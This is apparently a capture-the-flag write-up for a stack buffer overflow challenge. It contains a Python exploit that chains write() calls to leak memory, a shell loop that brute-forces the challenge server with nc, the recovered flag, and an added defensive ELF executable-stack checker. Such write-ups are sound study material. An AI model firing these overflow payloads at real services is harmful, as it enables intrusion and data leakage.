Topic: simple stack-based buffer overflow
binary :
```python
import time
import struct

# Pack a 32-bit little-endian word (format string assumed: "<L")
p = lambda x: struct.pack("<L", x)

write = 0x08048440   # address used to call write()
ppppr = 0x080486a6   # pop; pop; pop; pop; ret
pppr = ppppr + 1     # pop; pop; pop; ret
ppr = pppr + 1       # pop; pop; ret
pr = ppr + 1         # pop; ret
r = pr + 1           # ret

payload = b"A" * 0x64

# For every candidate address in the range, chain one write(1, i, 0x1000) call.
for i in range(0x09371008, 0x094ed008, 0x1000):
    payload += p(write)   # ret here
    payload += p(pppr)    # clear the three arguments before the next call
    payload += p(1)       # fd = stdout
    payload += p(i)       # buf = candidate address
    payload += p(0x1000)  # count

with open("a.txt", "wb") as f:
    f.write(payload)

"""
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# execstack ./chall_heap
- ./chall_heap
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# while [ 1 ] ; do (cat a.txt) | nc 23.23.190.205 8976 ; done > nc.txt
^C
root@ubuntu:/home/sweetchip/Desktop/cyber/ncon# cat nc.txt | sort | uniq -c
      1 ?Good Enough? Pwn Me!
      1 96d1c4d1f47b666928a37f7dd6a4383e
     77 Good Enough? Pwn Me!
key : 96d1c4d1f47b666928a37f7dd6a4383e
"""
```
Running the code above as a brute force about 100 times prints the key roughly once.
Aaargh..
flag : 96d1c4d1f47b666928a37f7dd6a4383e
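The `- ./chall_heap` line in the session above is execstack's marker for a binary that does not request an executable stack, a status read from the ELF `PT_GNU_STACK` program header. The following is an added example, not code from the original post, that performs the same hardening check on a 32-bit little-endian ELF image; `stack_marking` and `make_sample` are hypothetical helper names, and the sample images are constructed inline.

```python
import struct

PT_LOAD = 1
PT_GNU_STACK = 0x6474E551  # program header that carries the stack permissions
PF_X = 0x1                 # execute bit in p_flags


def stack_marking(elf):
    """Return 'X' (executable stack requested), '-' (not requested) or
    '?' (no PT_GNU_STACK entry) for a 32-bit little-endian ELF image."""
    if len(elf) < 52 or elf[:4] != b"\x7fELF" or elf[4:6] != b"\x01\x01":
        raise ValueError("not a 32-bit little-endian ELF")
    (e_phoff,) = struct.unpack_from("<I", elf, 0x1C)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x2A)
    for n in range(e_phnum):
        off = e_phoff + n * e_phentsize
        if off + 32 > len(elf):
            raise ValueError("program header table is truncated")
        (p_type,) = struct.unpack_from("<I", elf, off)
        (p_flags,) = struct.unpack_from("<I", elf, off + 24)
        if p_type == PT_GNU_STACK:
            return "X" if p_flags & PF_X else "-"
    return "?"


def make_sample(p_type, p_flags):
    """Constructed sample: a bare ELF32 header followed by one program header."""
    ehdr = struct.pack("<16sHHIIIIIHHHHHH",
                       b"\x7fELF\x01\x01\x01" + b"\0" * 9,  # e_ident
                       2, 3, 1, 0,   # e_type, e_machine (i386), e_version, e_entry
                       52, 0, 0,     # e_phoff, e_shoff, e_flags
                       52, 32, 1,    # e_ehsize, e_phentsize, e_phnum
                       0, 0, 0)      # section header fields, unused here
    phdr = struct.pack("<8I", p_type, 0, 0, 0, 0, 0, p_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    print(stack_marking(make_sample(PT_GNU_STACK, 0x6)))  # RW stack
    print(stack_marking(make_sample(PT_GNU_STACK, 0x7)))  # RWX stack
    print(stack_marking(make_sample(PT_LOAD, 0x5)))       # no stack header
```

To check a real file, pass `open(path, "rb").read()` to `stack_marking`.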